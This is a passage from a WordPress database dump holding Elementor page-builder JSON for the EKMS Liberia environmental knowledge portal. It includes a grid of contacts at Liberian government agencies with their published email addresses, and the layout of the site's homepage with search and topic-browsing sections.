Toure\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6b5064d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"0ffa3a0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr<\\/strong>\\n\\nCoordinator Climate Change Secretariat, EPA\\n\\n<a href=\\\"mailto:jjallah@epa.gov.lr\\\">jjallah@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5d6e5e3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c31131b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Konikay Nimely<\\/strong><br>\\n\\nEIA Manager, FDA<br>\\n\\n<a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Edward S. Kamara<\\/strong><br>\\n\\nMarketing and Forest Forecast<br>\\n\\n<a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Blamah Goll<\\/strong><br>\\nConservation Manager, FDA<br>\\n<a href=\\\"mailto:blamag@gmail.com\\\">blamag@gmail.com<\\/a><br>\\n<a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b2d79ff\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f970049\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"239344d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"6ab7cf6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62420a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Francis W. Mwah<\\/strong><br>\\n\\nDirector @ MOA<br>\\n\\n<a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9feecd9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John Willabo Johnson <\\/strong><br>\\n\\nAssistant Minister, MME<br>\\n\\n<a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe7894a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Urias Garsinii <\\/strong><br>\\nLand Use Management Manager, LLA<br>\\n<a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Aaron S.M. Wesseh<\\/strong><br>\\n\\nManager, CCCD Project<br>\\n\\n<a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"310af85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"8523c31\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(16903,2531,'_wp_page_template','default'),(16904,2531,'_elementor_edit_mode','builder'),(16905,2531,'_elementor_data','[{\"id\":\"lnk9sxt\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":900},\"height\":\"min-height\",\"custom_height\":{\"unit\":\"px\",\"size\":600},\"background_background\":\"slideshow\",\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"rgba(255,255,255,0.78)\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.5500000000000000444089209850062616169452667236328125},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"fabc2a1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_slideshow_gallery\":[{\"id\":2035,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_epa.jpg\"},{\"id\":2036,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_home1.jpg\"},{\"id\":2037,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_home2.jpg\"},{\"id\":2038,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_home3.jpg\"},{\"id\":2039,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_maps.jpg\"}],\"background_slideshow_ken_burns_zoom_direction\":\"out\"},\"elements\":[{\"id\":\"ghttmw8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"background_background\":\"classic\",\"background_color\":\"rgba(255,255,255,0.04)\"},\"elements\":[{\"id\":\"3q0r5o4\",\"elType\":\"widget\",\"settings\":{\"title\":\"Welcome to the EKMS\",\"align\":\"center\",\"title_color\":\"#014421\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":65},\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"4\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\",\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":25},\"typography_font_family\":\"Roboto\",\"typography_font_weight\":\"900\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f0wlz1l\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The EKMS provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Topics, Institutions and Documents.<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"10\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":26,\"sizes\":[]},\"typography_font_weight\":\"600\",\"typography_font_family\":\"Roboto\",\"typography_line_height\":{\"unit\":\"em\",\"size\":1.1999999999999999555910790149937383830547332763671875,\"sizes\":[]},\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f4a4a39\",\"elType\":\"widget\",\"settings\":{\"search_placeholder_text\":\"Search Knowledge Resources...\",\"show_search_category_list\":\"yes\",\"search_category_select_placeholder\":\"Entire Resource\",\"results_counter_text\":\"Results\",\"full_results_btn_text\":\"See all results\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c6a37ad\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c698fbe\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"negative_search\":\"Sorry, but nothing matched your search terms.\",\"server_error\":\"Sorry, but we cannot handle your search query now. Please, try again later!\",\"search_submit_bg_color\":\"rgba(0,100,0,0.86)\",\"search_category_color\":\"#000000\",\"search_taxonomy\":\"resource_type\"},\"elements\":[],\"widgetType\":\"jet-ajax-search\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b467af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4a9f59c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"fb58b71\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f8f4095\",\"elType\":\"widget\",\"settings\":{\"title\":\"Knowledge Resources\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#54595f\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"62059d5\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"cc6fadf\",\"elType\":\"widget\",\"settings\":{\"min_height\":{\"unit\":\"px\",\"size\":450,\"sizes\":[]},\"show_terms\":\"\",\"show_terms_num\":\"2\",\"excerpt_length\":\"\",\"excerpt_trimmed_ending\":\"...\",\"show_date\":\"\",\"post_type\":\"related_topic\",\"custom_query_by\":\"ids\",\"post_ids\":\"468,470,473,474,487\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"5b2266b\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"76431bc\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"boxes_gap\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"boxes_title_color\":\"#ffffff\",\"boxes_title_color_hover\":\"#006400\",\"boxes_title_typography_typography\":\"custom\",\"boxes_title_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"boxes_title_typography_font_weight\":\"900\",\"boxes_title_alignment\":\"left\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-tiles\"},{\"id\":\"724fd77\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Topics\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/related-topics\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e8d8c\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/home_4.jpg\",\"id\":258},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5c4a65b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b82855d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"9b26f8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"8d9d9b1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Institution\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7448ecc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Explore Government and Other Institutions that have direct linkages with environmental policies and development.\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"cdd4f69\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore By Insitution\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/institutions-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a2777f6\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_land_climate.jpg\",\"id\":493},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"cc16d03\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b4fc23b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"f419151\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"99692db\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Document\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f7b0473\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Explore the EKMS Document 